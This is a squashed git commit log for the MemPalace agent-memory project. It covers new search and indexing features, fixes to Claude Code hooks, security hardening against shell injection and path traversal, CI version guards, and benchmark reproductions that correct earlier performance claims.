tags - Hook status messages (CURRENT TIME, Checking verified facts, etc.) - Claude Code UI chrome (ctrl+o to expand, progress bars, etc.) - Collapsed runs of blank lines This noise was going straight into drawers, wasting storage space and polluting search results. strip_noise() runs on all normalized output regardless of input format (JSONL, JSON, plain text). 689/689 tests pass. Co-Authored-By: Claude Opus 4.6 (1M context) <[email protected]> * feat: add closet layer — searchable index pointing to drawers The closet architecture was always part of MemPalace's design but never shipped in the public codebase. This adds it. 
Palace now has TWO collections: - mempalace_drawers — full verbatim content (unchanged) - mempalace_closets — compact AAAK-style index entries How it works: - When mining, each file gets a closet alongside its drawers - Closet contains extracted topics, entities, quotes as pointers - Closets pack up to 1500 chars, topics never split mid-entry - Search hits closets first (fast, small), then hydrates the full drawer content for matching files - Falls back to direct drawer search if no closets exist yet Files changed: - palace.py: get_closets_collection(), build_closet_text(), upsert_closet(), CLOSET_CHAR_LIMIT - miner.py: process_file() now creates closets after drawers - searcher.py: search_memories() tries closet-first search, hydrates drawers, falls back to direct search Backwards compatible — existing palaces without closets continue to work via the fallback path. Closets are created on next mine. 689/689 tests pass. Co-Authored-By: Claude Opus 4.6 (1M context) <[email protected]> * fix: enforce atomic topics in closets, extract richer pointers - upsert_closet replaced by upsert_closet_lines: checks each topic line individually against CLOSET_CHAR_LIMIT. If adding one line WHOLE would exceed the limit, starts a new closet. Never splits mid-topic. - build_closet_lines returns a list of atomic lines (not joined text) - Richer extraction: section headers, more action verbs, up to 3 quotes, up to 12 topics per file - Each line is complete: topic|entities|→drawer_refs Co-Authored-By: Claude Opus 4.6 (1M context) <[email protected]> * docs: add CLOSETS.md — closet layer overview Cherry-picked the docs portion of 67e4ac6 to accompany the closet feature. Test coverage for closets is omnibus with tests for entity metadata and BM25 (see PR targeting those features) and will land together in a follow-up. Co-Authored-By: MSL <[email protected]> * feat: entity metadata + diary ingest + BM25 hybrid search Three features that close the gap between the architecture docs and the actual codebase: 1. Entity metadata on drawers and closets - _extract_entities_for_metadata() pulls names from known_entities.json + proper nouns appearing 2+ times - Stamped as "entities" field in ChromaDB metadata - Enables filterable search by person/project name 2. Day-based diary ingest (diary_ingest.py) - ONE drawer per day, upserted as the day grows - Closets pack topics atomically, never split mid-topic - Tracks entry count in state file, only processes new entries - Usage: python -m mempalace.diary_ingest --dir ~/summaries 3. BM25 hybrid search in searcher.py - _bm25_score() keyword matching complements vector similarity - _hybrid_rank() combines both signals (60% vector, 40% BM25) - Catches exact name/term matches that embeddings miss - Applied to both closet-first and direct drawer search paths 689/689 tests pass. Co-Authored-By: Claude Opus 4.6 (1M context) <[email protected]> * test: add tests for mine_lock, closets, entity metadata, BM25, diary Trimmed version of Milla's omnibus test_closets.py to only cover features present in this PR stack (#784 lock, #788 closets, this PR's entity/BM25/diary). Strip-noise tests will land with #785; tunnel tests will land with the tunnels PR. 16/16 pass. Co-Authored-By: MSL <[email protected]> * feat: explicit cross-wing tunnels for multi-project agents Adds active tunnel creation alongside passive tunnel discovery. Passive tunnels (existing): rooms with the same name across wings. Explicit tunnels (new): agent-created links between specific locations. 
"This API design in project_api relates to the database schema in project_database." New functions in palace_graph.py: - create_tunnel() — link two wing/room pairs with a label - list_tunnels() — list all explicit tunnels, filter by wing - delete_tunnel() — remove a tunnel by ID - follow_tunnels() — from a room, find all connected rooms in other wings with drawer content previews New MCP tools: - mempalace_create_tunnel - mempalace_list_tunnels - mempalace_delete_tunnel - mempalace_follow_tunnels Tunnels stored in ~/.mempalace/tunnels.json (persists across palace rebuilds). Deduplicated by endpoint pair. 689/689 tests pass. Co-Authored-By: Claude Opus 4.6 (1M context) <[email protected]> * test: add TestTunnels for cross-wing tunnel operations Appended from Milla's omnibus test_closets.py — covers create, list, delete, dedup, and follow_tunnels behavior. 21/21 pass. Co-Authored-By: MSL <[email protected]> * feat(search): drawer-grep returns best-matching chunk + neighbors When a closet hit leads to a source file with many drawers, grep each chunk for query terms and return the BEST-MATCHING chunk + 1 neighbor on each side, instead of dumping the whole file truncated at MAX_HYDRATION_CHARS. Result now includes drawer_index and total_drawers so callers can request adjacent drawers explicitly. Extracted from Milla's commit 935f657 which bundled drawer-grep with closet_llm (deferred pending LLM_ENDPOINT refactor) and fact_checker (separate PR). Ported only the searcher.py change. Co-Authored-By: Claude Opus 4.6 (1M context) <[email protected]> * feat: offline fact checker against entity registry + knowledge graph fact_checker.py verifies text for contradictions against locally stored entities and KG facts. Catches similar-name confusion (Bob vs Bobby), relationship mismatches (KG says husband, text says brother), and stale facts (KG valid_from/valid_to). No hardcoded facts. No network calls. Reads: - ~/.mempalace/known_entities.json - KnowledgeGraph SQLite Usage: from mempalace.fact_checker import check_text issues = check_text("Bob is Alice's brother", palace_path) # CLI python -m mempalace.fact_checker "text" --palace ~/.mempalace/palace Extracted from Milla's commit 935f657 which bundled this with closet_llm (deferred) and drawer-grep (PR #791). Ported only fact_checker.py — verified no network / API imports. Co-Authored-By: Claude Opus 4.6 (1M context) <[email protected]> * feat: optional LLM-based closet regeneration — bring-your-own endpoint Adds mempalace/closet_llm.py as an OPTIONAL path for richer closet generation. Regex closets remain the default and cover the local-first promise; users who want LLM-quality topics can bring their own endpoint. Configuration (env or CLI flag): LLM_ENDPOINT — OpenAI-compatible base URL (required) LLM_KEY — bearer token (optional; local inference skips this) LLM_MODEL — model name (required) Works with Ollama, vLLM, llama.cpp servers, OpenAI, OpenRouter, and any other provider that speaks OpenAI-compatible /chat/completions. Zero new dependencies — uses stdlib urllib. Replaces the original Anthropic-SDK-hardcoded version of this module from Milla's branch (commit 935f657). Same prompt, same parsing, same regenerate_closets flow; only the transport was generalised so the feature doesn't lock users into a specific vendor or require API keys for core memory operations (CLAUDE.md, "Local-first, zero API"). 
Includes 13 unit tests covering config resolution, request shape, auth-header omission when no key is set, code-fence stripping, and missing-config error path. All mocked — zero network calls in tests. Co-Authored-By: MSL <[email protected]> * fix(search): hybrid closet+drawer retrieval — closets boost, never gate (#795) * Fix: set cosine distance metadata on all collection creation sites ChromaDB defaults HNSW index to L2 (Euclidean) distance, but MemPalace scoring uses 1-distance which requires cosine (range 0-2). Add metadata={"hnsw:space": "cosine"} to the 4 production and 3 test call sites that were missing it. Closes #218 * fix: sync version.py to 3.2.0 Commit 6614b9b bumped pyproject.toml to 3.2.0 but missed mempalace/version.py, breaking test_version_consistency on every PR's CI. This syncs them. * refactor: extract locked filing block to keep mine_convos under C901 Adding the per-file lock + double-checked file_already_mined() in the previous commit pushed mine_convos cyclomatic complexity from 25 to 26, just over ruff's max-complexity threshold. Hoist the locked critical section into _file_chunks_locked() so the outer loop stays within budget. No behavior change. * style: ruff format mempalace/palace.py Add blank lines after inline imports in mine_lock. Pure formatting. * fix(normalize): make strip_noise verbatim-safe and scope it to Claude Code JSONL The initial strip_noise() regressed on three fronts when audited against adversarial user content — each verified with executable repros against the cherry-picked code: 1. `<tag>.*?</tag>` with re.DOTALL span-ate across messages: one stray unclosed <system-reminder> anywhere in a session merged with the next closing tag, silently deleting everything between them (including full assistant replies). 2. `.*\(ctrl\+o to expand\).*\n?` nuked entire lines of user prose whenever a user happened to document the TUI shortcut. 3. `Ran \d+ (?:stop|pre|post)\s*hook.*` with IGNORECASE ate the second sentence from "our CI has a stop hook ... Ran 2 stop hooks last week" — legitimate user commentary. These are unambiguous violations of the project's "Verbatim always" design principle. Fixes: - All tag patterns are now line-anchored (`(?m)^(?:> )?<tag>`) and their body forbids crossing a blank line (`(?:(?!\n\s*\n)[\s\S])*?`), so a dangling open tag cannot eat neighboring messages. - `_NOISE_LINE_PREFIXES` are line-anchored and case-sensitive — user prose mentioning "CURRENT TIME:" mid-sentence is preserved. - Hook-run chrome requires `(?m)^`, explicit hook names (Stop, PreCompact, PreToolUse, etc.), and no IGNORECASE. - "… +N lines" is line-anchored. - "(ctrl+o to expand)" only matches Claude Code's actual collapsed- output chrome shape `[N tokens] (ctrl+o to expand)`; a bare parenthetical in user prose stays intact. Scope: - `strip_noise()` is no longer called on every normalization path. Only `_try_claude_code_jsonl` invokes it, per-extracted-message — so Claude.ai exports, ChatGPT exports, Slack JSON, Codex JSONL, and plain text with `>` markers pass through fully verbatim. Per-message application also makes span-eating structurally impossible. Tests: - 15 new tests in test_normalize.py pin the boundary: 6 guard user content that must survive (each of the adversarial repros), 9 assert real system chrome is still stripped. All pass; full suite 702 pass (2 failures are the unrelated pre-existing version.py bug, cleared by #820). 
Known limitation (not fixed here): convo_miner.py does not delete drawers on re-mine, so transcripts mined before this PR keep noise- filled drawers until the user manually erases + re-mines. Proper fix needs a schema-version field on drawer metadata + re-mine trigger — out of scope for this PR. * feat(normalize): auto-rebuild stale drawers via NORMALIZE_VERSION schema gate Without this, the strip_noise improvement only helps new mines. Every user who had already mined Claude Code JSONL sessions would keep their noise-polluted drawers forever, because convo_miner's file_already_mined skip short-circuits before re-processing. Adds a versioned schema gate so upgrades propagate silently: - palace.NORMALIZE_VERSION=2 — bumped when the normalization pipeline changes shape (this PR's strip_noise is the v1→v2 bump). - file_already_mined now returns False if the stored normalize_version is missing or less than current, triggering a rebuild on next mine. - Both miners stamp drawers with the current normalize_version. - convo_miner now purges stale drawers before inserting fresh chunks (mirrors miner.py's existing delete+insert), extracted into _file_convo_chunks helper to keep mine_convos under ruff's C901 limit. User experience: upgrade mempalace, run `mempalace mine` as usual, old noisy drawers get silently replaced with clean ones. No erase needed, no "you need to rebuild" changelog footgun. Tests: - test_file_already_mined_returns_false_for_stale_normalize_version — pins the version gate contract for missing/v1/current. - test_add_drawer_stamps_normalize_version — fresh project-miner drawers carry the field. - test_mine_convos_rebuilds_stale_drawers_after_schema_bump — end-to-end proof that a pre-v2 palace gets silently cleaned on next mine, with orphan drawers purged and NOT skipped. Existing test_file_already_mined_check_mtime updated to include the new field; all other tests unaffected. * fix: stop hooks from making agents write in chat — save tokens The save hook and precompact hook were telling the agent to write diary entries, add drawers, and add KG triples IN THE CHAT WINDOW. Every line written stays in conversation history and retransmits on every subsequent turn — ~$1/session in wasted tokens. Fix: hooks now say "saved in background, no action needed" and use decision: allow instead of block. The agent continues working without interruption. All filing happens via the background pipeline. Also updated hooks README with: - Known limitation: hooks require session restart after install - Updated cost section: zero tokens, background-only Co-Authored-By: Claude Opus 4.6 (1M context) <[email protected]> * fix: use microsecond timestamp and full content hash in diary entry ID (#819) * fix: remove unused import 'main' from mempalace/__init__.py Removed the 'main' import from `mempalace/__init__.py` and updated `pyproject.toml` to point the script entry point directly to `mempalace.cli:main`. This ensures the CLI remains functional while improving code hygiene. Co-authored-by: igorls <[email protected]> * merge: full hardened stack + rewrite fact_checker around actual KG API Merges the full hardened stack (up through #791 drawer-grep) and turns fact_checker from "dead code hidden behind bare except" into an actually-working offline contradiction detector with tests. ## Dead paths the PR body advertised but the code never executed Both buried by a single outer ``except Exception: pass``: * ``kg.query(subject)`` — ``KnowledgeGraph`` has no ``query()`` method; it has ``query_entity()``. 
The attribute error was silently swallowed and the entire KG branch always returned ``[]``. Now using ``kg.query_entity(subject, direction="outgoing")`` with proper handling of the ``predicate``/``object``/``current``/``valid_to`` fields the real API returns. * ``KnowledgeGraph(palace_path=palace_path)`` — the constructor's only kwarg is ``db_path``. Passing ``palace_path`` raised TypeError, silently swallowed. Now computing the db_path correctly from ``<palace>/knowledge_graph.sqlite3``, matching the convention the MCP server already uses. ## Contradiction logic rewritten The previous ``if kg_pred in claim and fact.object not in claim`` only fired when text used the SAME predicate word as the KG fact — the exact opposite of the stated use case ("Bob is Alice's brother" when KG says husband" would NOT have fired). Replaced with a proper parse → lookup → compare pipeline: * ``_extract_claims`` parses two surface forms ("X is Y's Z" and "X's Z is Y") into ``(subject, predicate, object)`` triples. * ``_check_kg_contradictions`` pulls the subject's outgoing facts and flags two classes: - ``relationship_mismatch`` when a current KG fact matches the same ``(subject, object)`` pair but with a different predicate. - ``stale_fact`` when the exact triple exists but is ``valid_to``-closed in the past. * Stale-fact detection is now implemented (the PR body claimed it; the old code silently didn't implement it). ## Performance fix — O(n²) → O(mentioned × n) ``_check_entity_confusion`` previously computed Levenshtein for every pair of registered names on every ``check_text`` call. For 1,000 registered names that's ~500K edit-distance calls per hook invocation. Now we first identify which registry names actually appear in the text (single regex scan), then only compute edit distance between mentioned and unmentioned names. Pinned by a test that asserts <200ms on a 500- name registry with zero mentions. Also: when *both* similar names are mentioned in the text, we no longer flag them — the user clearly knows they're different people. ## Shared entity-registry loader ``mempalace/miner.py`` already had an mtime-cached loader for ``~/.mempalace/known_entities.json``. fact_checker had a duplicate implementation that leaked file handles and ignored caching. Extended miner's cache to expose both the flat set (``_load_known_entities``) and the raw category dict (``_load_known_entities_raw``); fact_checker now imports the latter. No more double disk reads, no more handle leak. ## Tests — 24 cases in tests/test_fact_checker.py All three detection paths + both dead-code regressions: * ``test_kg_init_uses_db_path_not_palace_path_kwarg`` — pins the correct KG constructor signature so the ``palace_path=`` bug can't come back. * ``test_relationship_mismatch_detected`` — the headline example from the PR body now actually fires. * ``test_stale_fact_detected`` — valid_to-closed triple is flagged. * ``test_current_fact_same_triple_is_not_flagged`` — no false positive on a still-valid match. * ``test_performance_bounded_by_mentioned_names`` — 500-name registry, zero mentions, <200ms. Regression for the O(n²) blowup. * ``test_no_false_positive_when_both_names_mentioned`` — Mila and Milla in the same text is fine. * Plus claim extraction, flatten_names shapes, CLI exit code, empty text handling, missing-palace graceful fallback, registry-dict shape support. 785/785 suite pass. ruff + format clean on CI-pinned 0.4.x. 
* Optimize entity detection with regex caching and pre-compilation - Use functools.lru_cache to cache compiled patterns for entity names. - Pre-compile static pronoun patterns into a single regex. - Remove redundant .lower() calls in score_entity loop. Co-authored-by: igorls <[email protected]> * docs: fix stale milla-jovovich org URLs in website and plugin manifests (#787) Follow-up to #766 which covers version.py, pyproject.toml, README, CHANGELOG, and CONTRIBUTING. These 11 files still had the old org name in URLs: - website/ (VitePress config + 6 docs pages) - .claude-plugin/ (plugin.json repository, README marketplace command) - .codex-plugin/ (plugin.json URLs, README links) Author name fields are intentionally unchanged. * test: make diary state path assertion platform-neutral The Windows CI job failed on: assert '/.mempalace/state/' in str(state_path) because Windows uses ``\`` as the path separator, so the substring never matches. The behavior under test (state file lives outside the diary dir, under ``~/.mempalace/state/``) is already correct on both platforms — only the assertion was Unix-only. Switch to ``state_path.parent`` comparisons that work on any OS. * test: serialize mine_lock concurrency test with multiprocessing The macOS CI job failed ``test_lock_blocks_concurrent_access`` because ``fcntl.flock`` on BSD/macOS is per-*process*, not per-FD: two threads in the same process both acquire even when they open their own file descriptors. The test passed on Linux (per-FD flock) and Windows (per-FD ``msvcrt.locking``) but was never actually exercising the lock's real contract. ``mine_lock`` is designed to serialize multi-*agent* access — i.e., separate processes, not threads. Switch the test to ``multiprocessing.get_context('spawn')`` with a module-level worker (so the spawn pickles cleanly) so it: 1. reflects the actual use case (one lock per mining process); 2. passes on all three OSes without flock-semantics branching; 3. catches real regressions (a broken lock would now let both processes through, exactly what we care about). Hold time bumped to 0.3s and the "wait until p1 acquires" delay to 0.2s to tolerate spawn's higher startup latency on macOS/Windows. * test: verify mine_lock via disjoint critical-section intervals The previous revision used multiprocessing but still relied on timing ("second process waited at least N seconds") which flakes on CI where spawn overhead eats into the hold window. Linux CI observed the second process report a 0.088s wait — below the 0.1s threshold — even though the lock behavior was correct; spawn was just slow enough that the first process had nearly finished holding when the second got past its own spawn. Switch to effect-based verification: each worker logs its [enter_time, exit_time] inside the critical section, and the test asserts the two intervals are disjoint after sorting. A broken lock would produce overlapping intervals regardless of spawn latency; a working lock cannot. Also removed the mp.Queue since we no longer pass timing data back. * Fix: ruff format with CI-pinned version (0.4.x) * fix: README audit — 42 TDD tests + hall detection + 7 claim fixes (#835) * fix: README audit — match every claim to shipped code + add hall detection TDD audit: wrote 42 tests verifying README claims against codebase. Fixed all 7 failures: 1. Tool count: 19 → 29 (10 tools were undocumented) 2. Added tool table rows for tunnels, drawer management, system tools 3. Version badge: 3.1.0 → 3.2.0 4. 
dialect.py file reference: "30x lossless" → "AAAK index format for closet pointers" 5. Wake-up token cost: "~170 tokens" → "~600-900 tokens" (matches layers.py) 6. pyproject.toml version in project structure: v3.0.0 → v3.2.0 7. Hall detection: added detect_hall() to miner.py — drawers now tagged with hall metadata so palace_graph.py can build hall connections New code: - miner.py: detect_hall() — keyword scoring against config hall_keywords, writes hall field to every drawer's metadata - tests/test_hall_detection.py — 12 TDD tests (written before code) - tests/test_readme_claims.py — 42 TDD tests verifying README accuracy 859/859 tests pass. Co-Authored-By: Claude Opus 4.6 (1M context) <[email protected]> * fix: resolve ruff lint — unused imports and variables Co-Authored-By: Claude Opus 4.6 (1M context) <[email protected]> * style: ruff format with CI-pinned 0.4.x Co-Authored-By: Claude Opus 4.6 (1M context) <[email protected]> * fix: use conftest fixtures in hall tests for Windows compat Windows CI fails with NotADirectoryError when ChromaDB tries to write HNSW files in short-lived TemporaryDirectory. Use conftest palace_path and tmp_dir fixtures instead — same pattern as all other tests that touch ChromaDB. Co-Authored-By: Claude Opus 4.6 (1M context) <[email protected]> * fix: address Igor's review — convo_miner halls, cached config, markdown typo TDD: wrote tests for convo_miner hall metadata and config caching BEFORE verifying the code changes. 1. README markdown typo: extra ** in wake-up token row (line 195) 2. convo_miner.py: added _detect_hall_cached() — conversation drawers now get hall metadata (was missing, Igor caught it) 3. miner.py + convo_miner.py: cached hall_keywords at module level so config.json isn't re-read per drawer during bulk mine 4. New tests: TestConvoMinerWritesHalls, TestDetectHallCaching 861/861 tests pass. ruff clean. Co-Authored-By: Claude Opus 4.6 (1M context) <[email protected]> --------- Co-authored-by: Claude Opus 4.6 (1M context) <[email protected]> * fix(website): update vitepress base url for custom domain * chore(release): bump version strings to 3.3.0 and curate CHANGELOG Prepare develop for the 3.3.0 release cycle. Version bumps: - mempalace/version.py: 3.2.0 -> 3.3.0 - pyproject.toml: 3.2.0 -> 3.3.0 - README.md: pyproject.toml label and shields.io badge - uv.lock: mempalace 3.0.0 -> 3.3.0 (also fills in resolved dev/extras) CHANGELOG.md: - Close out the stale [Unreleased] section as [3.2.0] - 2026-04-12 (v3.2.0 was tagged on that date but the release flip was never made) - Add a fresh [Unreleased] - v3.3.0 section covering the 49 commits since v3.2.0: closet layer, BM25 hybrid search, entity metadata, diary ingest, cross-wing tunnels, drawer-grep, offline fact checker, LLM-based closet regen, hall detection, cosine-distance fix, multi-agent locking, README audit, etc. - Adopt Keep a Changelog + SemVer framing - Add version compare reference links at the bottom - Fix stale milla-jovovich/mempalace preamble URL to MemPalace/mempalace --------- Co-authored-by: MSL <[email protected]> Co-authored-by: Claude Opus 4.6 (1M context) <[email protected]> Co-authored-by: eblander <[email protected]> Co-authored-by: shafdev <[email protected]> Co-authored-by: google-labs-jules[bot] <161369871+google-labs-jules[bot]@users.noreply.github.com> Co-authored-by: mvalentsev <[email protected]> Co-authored-by: Dominique Deschatre <[email protected]> * ci: serve docs from develop only Docs deploy to GitHub Pages from develop for faster iteration cycles. 
Main was failing the deploy step with "Branch 'main' is not allowed to deploy to github-pages due to environment protection rules" on every release merge (v3.2.0, v3.3.0) — noise without signal, since docs weren't meant to serve from main anyway. Removes main from both the push trigger and the deploy-job guard. Develop continues to deploy as before; manual dispatch still works. * fix(status): paginate metadata fetch to support large palaces `col.get(limit=total)` causes SQLite "too many SQL variables" on palaces with >10k drawers (#802) and on older versions the hardcoded limit=10000 silently truncated the count (#850). Paginate in 5k batches using offset and aggregate wing/room counts incrementally. Also use `col.count()` for the header instead of `len(metas)` so the displayed total is always correct. Tested on a 122,686-drawer palace. Fixes #850 Related: #802, #723 * refactor: route all chromadb access through ChromaBackend Prerequisite for RFC 001 (plugin spec, #743). Removes every direct `import chromadb` outside the ChromaDB backend itself so the core modules depend only on the backend abstraction layer. Extends ChromaBackend with make_client, get_or_create_collection, delete_collection, create_collection, and backend_version. Adds update() to the BaseCollection contract. Non-backend callers (mcp_server, dedup, repair, migrate, cli) now go through the abstraction; tests patch ChromaBackend instead of chromadb. With this landed, the RFC 001 spec can be enforced and PalaceStore (#643) can ship as a plugin without touching core modules. * fix: update stale org URLs in pyproject.toml and README (#787) * fix: harden hooks against shell injection, path traversal, and arithmetic injection save_hook.sh: - Coerce stop_hook_active to strict True/False before eval to prevent command injection via crafted JSON (e.g. "$(curl attacker.com)") - Validate LAST_SAVE as plain integer with regex before bash arithmetic to prevent command substitution via poisoned state files hooks_cli.py: - Add _validate_transcript_path() that rejects paths with '..' components and non-.jsonl/.json extensions - _count_human_messages() now uses the validator, returning 0 for invalid paths instead of opening arbitrary files Tests: - Path traversal rejection (../../etc/passwd) - Wrong extension rejection (.txt, .py) - Valid path acceptance (.jsonl, .json) - Empty string handling - Shell injection in stop_hook_active field Refs: MemPalace/mempalace#809 * fix: add logging on rejected transcript paths and platform-native path test - _count_human_messages() now logs a WARNING via _log() when a non-empty transcript_path is rejected by the validator, making silent auto-save failures diagnosable via hook.log - Add test for platform-native paths (backslashes on Windows) to verify _validate_transcript_path works cross-platform - Add test verifying the warning log is emitted on rejection Refs: MemPalace/mempalace#809 * Increase visibility of fake website caution Noticed a URL ``` hXXps://www.mempalace[.]tech/ ``` Though the README currently warns, it is perhaps best to surface it at urgency level at the top of the README. * fix: use permissive validator for KG entity values (closes #455) sanitize_name rejects commas, colons, parentheses, and slashes — characters that commonly appear in knowledge graph subject/object values. Adds sanitize_kg_value for KG entity fields (subject, object, entity) while keeping sanitize_name for predicates and wing/room names. 
* chore: bump plugin manifests to 3.3.0 and fix owner URL Aligns marketplace.json and both plugin.json files with version.py / pyproject.toml (already at 3.3.0) so `/plugin update` reflects the v3.1.0/v3.2.0/v3.3.0 tags that had been landing without manifest bumps. Also updates marketplace.json `owner.url` from the stale github.com/milla-jovovich path to the current github.com/MemPalace org. Refs #874 * ci: add version guard to catch tag/manifest drift Fails a tag push if `vX.Y.Z` does not match `mempalace/version.py` (the single source of truth per CLAUDE.md), and fails PRs that touch any version file without keeping all five in sync (pyproject.toml, version.py, .claude-plugin/marketplace.json, .claude-plugin/plugin.json, .codex-plugin/plugin.json). Prevents the class of bug described in #874, where v3.1.0/v3.2.0/v3.3.0 tags all landed pointing at commits that still carried manifest version 3.0.14, blocking `/plugin update` for end users. Refs #874 * ci: let semver pre-release tags bypass strict manifest match Tags matching `vX.Y.Z-*` (e.g. v3.4.0-rc1, v1.0.0-beta.2) are treated as internal/staging builds. They skip the tag-vs-manifest check because pre-releases do not flow to end users via `/plugin update`, which reads the manifest on the default branch. Stable tags `vX.Y.Z` still require all five version sources to match exactly, so the protection against the #874 drift remains intact. The cross-file consistency check on PRs is unchanged — all manifests must still agree with mempalace/version.py whenever any version file moves. * fix: ship CNAME in Pages artifact to pin custom domain Adds website/public/CNAME containing `mempalaceofficial.com` so the VitePress build output always includes /CNAME in the Pages artifact. Without this, the custom-domain setting is only held in the repo's Pages API config — if it ever drifts (manual edit, org move, workflow change), the site reverts to <org>.github.io with no record in source. Note: this does not fix the current site outage. The root cause is DNS — mempalaceofficial.com has no A/AAAA/CNAME records pointing at GitHub Pages IPs. That has to be fixed at the registrar. This commit is the belt-and-suspenders so that once DNS is back, the domain is pinned in source and the next workflow refactor can't accidentally drop it. * docs: tighten SECURITY.md with real version policy and GHPVR-only channel Builds on @Yorji-Porji's draft by fixing three issues before it lands: - Replace the `< 1.0.0` placeholder table with MemPalace's actual support policy: current major (3.x) receives fixes, 2.x and earlier do not. - Remove the `[Insert Maintainer Email Here]` placeholder and the email fallback. GitHub Private Vulnerability Reporting is enabled on this repo; the policy points there exclusively so there is no risk of a researcher emailing a dead address. - Drop the meta-note ("Adjust the table above…") that was an instruction to the maintainer, not policy text. Structure, triage timelines, and credit language are kept as drafted. * fix: allow mining directories without local mempalace.yaml When no mempalace.yaml or mempal.yaml exists in the source directory, return a default config (wing = directory name, room = general) instead of calling sys.exit(1). This lets users mine any directory into their palace without requiring init first. Closes #14. 
* fix: remove unused sys import

* fix: send missing-yaml warning to stderr and flag basename collisions
Addresses review feedback on #604:
- Warning now goes to stderr instead of stdout so it doesn't mix with mine progress output when users pipe stdout elsewhere.
- Warning explicitly calls out that directories with the same basename will share a wing name, and suggests adding mempalace.yaml to disambiguate. Prevents silent content mixing across projects mined without yaml.

* docs: name official domain and specific impostors in scam alert
Replace the blanket ban on .tech/.io/.com domains with an allowlist of real MemPalace surfaces (GitHub repo, PyPI, mempalaceofficial.com) and call out mempalace.tech as the reported impostor. The blanket .com ban would have flagged mempalaceofficial.com as fake once DNS resolves (CNAME shipped in #877). Also update the April 11 follow-up section to match so the two notices no longer contradict each other.

* perf: optimize regex compilation in entity extraction
Move regular expression compilation to the module level in `dialect.py` to prevent repeated parsing during loop execution.
Co-authored-by: igorls <[email protected]>

* feat: add MEMPAL_VERBOSE toggle — developers see diaries in chat (#871)
export MEMPAL_VERBOSE=true → hook blocks, agent writes diary in chat
export MEMPAL_VERBOSE=false → silent background save (default)
Developers need to see code and diaries being written. Regular users want zero chat clutter. Now both work.
TDD: tests written first, failed, code fixed, tests pass.
Co-authored-by: Claude Opus 4.6 (1M context) <[email protected]>

* feat: add VSCode devcontainer matching CI environment
Contributors now get a one-click dev environment that mirrors CI exactly: Python 3.11 (middle of the 3.9/3.11/3.13 matrix), ruff pinned to the same >=0.4.0,<0.5 range CI enforces, and pre-commit hooks auto-installed from the existing .pre-commit-config.yaml. Pinning ruff in post-create.sh is the load-bearing piece: pyproject only sets a floor, so without the pin the ruff extension would install 0.15.x and phantom-fail lint against CI's 0.4.x.

* fix: add missing self._lock to query_relationship, timeline, stats in KnowledgeGraph

* fix: replace invalid 'decision: allow' with {} in hooks
Closes #872. The top-level decision field only recognizes "block". To not block, return empty JSON {}. "allow" was silently ignored by Claude Code, causing unpredictable behavior.
Co-Authored-By: Claude Opus 4.6 (1M context) <[email protected]>

* fix: add missing self._lock to KnowledgeGraph.close()
TDD: test first, failed, fixed, passed. Igor fixed query_relationship/timeline/stats in an earlier commit. close() was the last method touching self._connection without holding the lock.
Closes #883.
Co-Authored-By: Claude Opus 4.6 (1M context) <[email protected]>

* benchmarks: add --llm-backend ollama for non-Anthropic rerank
The rerank pipeline was hardcoded to Anthropic's /v1/messages. Add a backend flag so the same code path can be exercised with any OpenAI-compatible endpoint — local Ollama, Ollama Cloud, or any gateway that speaks /v1/chat/completions. Enables independent verification of the "100% with Haiku rerank" claim by running the full benchmark with a different LLM family (e.g. minimax-m2.7:cloud) and zero Anthropic dependency.
Both longmemeval_bench.py and locomo_bench.py:
- llm_rerank*() gain backend= / base_url= kwargs
- CLI: --llm-backend {anthropic,ollama}, --llm-base-url
- API key required only when backend=anthropic (diary/palace modes still require it)
- Parse last integer in response (reasoning models emit multi-int output)
- Fallback to message.reasoning when content is empty
- Raise max_tokens to 1024 for reasoning models

* benchmarks: apply ruff-format to llm_rerank (trivial line wrap)

* benchmarks: add v3.3.0 reproduction results + 50/450 split
Addresses #875: every internal BENCHMARKS.md claim reproduced on Linux x86_64 (v3.3.0 tag, deterministic ChromaDB embeddings, seed=42 for the LongMemEval dev/held-out split).
Scorecard — all reproduce exactly:
- LongMemEval raw R@5 96.6% (500/500) ✅
- hybrid_v4 held-out 450 R@5 98.4% (442/450) ✅
- hybrid_v4 + minimax rerank R@5 99.2% (496/500) *
- hybrid_v4 + minimax rerank R@10 100.0% (500/500) *
- LoCoMo (session, top-10) raw 60.3% (1986q) ✅
- hybrid v5 88.9% (1986q) ✅
- ConvoMem all-categories (250 items) 92.9% ✅
- MemBench all-categories (8500) 80.3% ✅
* The minimax-m2.7:cloud rerank run replicates the "100%" claim with a different LLM family (no Anthropic dependency). R@10 is a perfect reproduction; R@5 misses 4 questions that the published Haiku run caught — consistent with BENCHMARKS.md's own disclosure that hybrid_v4 includes three question-specific fixes developed by inspecting misses, i.e. teaching to the test.
The committed 50/450 split is the deterministic (seed=42) split BENCHMARKS.md references but wasn't previously in the repo. Full result JSONLs include every question, every retrieved id, and every score — auditable end-to-end.
* docs(website): align mempalaceofficial.com with honest benchmarks
Part of #875. Bring the VitePress site into line with the new README and the reproducibility scorecard: drop category-error comparisons, drop retracted claims, retain only metrics and caveats that survive audit.
website/index.md
- New tagline matches README (local-first, verbatim, pluggable backend, 96.6% R@5 raw, zero API calls).
- Replace the "MemPalace hybrid 100% / Supermemory ~99% / Mastra 94.87% / Mem0 ~85%" comparison table with a single honest table showing MemPalace's own retrieval-recall numbers (raw 96.6%, hybrid v4 held-out 98.4%). Add an explicit sentence explaining why we no longer publish a cross-system table on the landing page (retrieval recall vs QA accuracy are different metrics).
- Soften the "ChromaDB-powered vector search" feature blurb to be backend-agnostic, since the retrieval layer is pluggable.
website/reference/benchmarks.md
- Full rewrite of the retrieval-recall tables. No more "100%" headline; honest held-out 98.4% R@5 replaces it. Added the model-agnostic rerank result (99.2% R@5 / 100% R@10 with minimax-m2.7 via Ollama) to show the pipeline is not Haiku-specific.
- Drop the LoCoMo "Hybrid v5 + Sonnet rerank (top-50) 100%" row. With per-conversation session counts of 19-32 and top_k=50, the retrieval stage returns every session by construction — the number measures an LLM's reading comprehension, not retrieval.
- Drop the cross-system comparison tables. Link out to each project's own research page (Mastra, Mem0, Supermemory) for their published numbers and metric definitions.
- Rewrite reproduction commands to use the correct repository and demonstrate the new --llm-backend ollama flag.
website/concepts/the-palace.md
- Remove the "+34%" row / paragraph. Wing/room filtering is standard metadata filtering in the vector store, not a novel retrieval mechanism — the April-7 note already retracted that framing; this finishes the retraction on the website where it had remained.
website/guide/searching.md
- Same treatment for "34% retrieval improvement". Reframe as operational scoping, not a novel boost.
website/reference/contributing.md
- Update the "palace structure matters" bullet to reflect the same framing: scoping-not-magic.
website/concepts/knowledge-graph.md
